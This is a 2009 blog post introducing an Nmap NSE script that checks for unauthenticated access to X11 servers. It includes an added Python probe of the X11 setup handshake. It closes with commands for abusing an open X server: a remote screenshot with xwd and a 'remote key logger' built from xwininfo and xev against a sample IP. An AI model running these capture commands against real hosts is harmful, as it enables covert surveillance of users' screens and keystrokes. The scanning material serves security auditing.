Nmap NSE Script "x11-access.nse"

Wed, 29 Jul 2009 21:06:42 +0200
Tags: security, network

If an X server is listening on TCP port 6000+n (where n is the display number), you can probe whether you have access to that server by sending an X11 initial connection request.

I wrote an NSE (Nmap Scripting Engine) script that performs this check when one of the ports 6000+n is open. Since Nmap version 5.10BETA1, this script is included in Nmap.

If you use an earlier version of the tool, add this script to your Nmap script database: move the script into the default scripts directory (usually "/usr/share/nmap/scripts" or "/usr/local/share/nmap/scripts") and run:

# nmap --script-updatedb

Output looks like this (launched with the "-sC" option):

# nmap -sC 192.168.0.44

Starting Nmap 5.00 ( http://nmap.org ) at 2009-07-29 10:59 CEST
[...]
PORT     STATE SERVICE
6000/tcp open  X11
|_ x11-access: X server access is granted
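
The probe the script performs, written here as an added Python example (not the NSE script itself, nor code from the original post): it sends the 12-byte X11 connection setup request with empty authorization fields and classifies the server's reply (Success, Failed or Authenticate), which is the same check an administrator can run from another host to confirm a display is not reachable without xauth. The host, display number and the sample replies are constructed for illustration.

```python
import socket
import struct

X11_BASE_PORT = 6000  # display :n listens on TCP 6000+n


def build_setup_request() -> bytes:
    """Connection setup request with empty authorization-protocol name/data.

    Little-endian ('l'): byte-order, pad, major 11, minor 0, name length 0,
    data length 0, 2 pad bytes.  With no auth data the request is 12 bytes.
    """
    return struct.pack("<cxHHHHxx", b"l", 11, 0, 0, 0)


def parse_setup_reply(data: bytes) -> tuple[str, str]:
    """Classify the 8-byte header (and reason text) of the server's reply.

    Status byte: 0 = Failed (byte 1 = reason length, reason at offset 8),
    1 = Success, 2 = Authenticate (extra length in 4-byte words at offset 6).
    """
    if len(data) < 8:
        return ("malformed", "reply shorter than the 8-byte header")
    status = data[0]
    if status == 1:
        major, minor = struct.unpack_from("<HH", data, 2)
        return ("granted", f"X server access is granted (protocol {major}.{minor})")
    if status == 0:
        reason = data[8:8 + data[1]].decode("latin-1", "replace")
        return ("denied", reason or "access denied")
    if status == 2:
        (words,) = struct.unpack_from("<H", data, 6)
        reason = data[8:8 + 4 * words].rstrip(b"\0").decode("latin-1", "replace")
        return ("authenticate", reason or "further authentication required")
    return ("malformed", f"unexpected status byte {status}")


def probe_display(host: str, display: int = 0, timeout: float = 3.0) -> tuple[str, str]:
    """Send the setup request to host:display and classify the reply (network I/O)."""
    with socket.create_connection((host, X11_BASE_PORT + display), timeout=timeout) as sock:
        sock.sendall(build_setup_request())
        return parse_setup_reply(sock.recv(4096))


# Constructed sample replies (not captured from a real server) for offline checks.
SAMPLE_DENIED = struct.pack("<BBHHH", 0, 21, 11, 0, 6) + b"No protocol specified\0\0\0"
SAMPLE_GRANTED = struct.pack("<BxHHH", 1, 11, 0, 0)  # header only; real replies carry more
SAMPLE_AUTH = struct.pack("<BxxxxxH", 2, 4) + b"Authenticate!\0\0\0"
```

A "denied" verdict with "No protocol specified" is what a server protected by xauth returns to an unauthenticated client; "granted" corresponds to the script output shown above.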

Here are a few ideas of what you can do once you are granted access to an X server:

Remote snapshot:

$ xwd -silent -root -display 192.168.0.44:0.0 -out snapshot.xwd
$ xwud -in snapshot.xwd

Remote key logger:

$ xwininfo -display 192.168.0.44:0.0 -root   # to get the root window id
$ xwininfo -display 192.168.0.44:0.0 -children -id <root_window_id>
$ xev -display 192.168.0.44:0.0 -id 0x<window_id>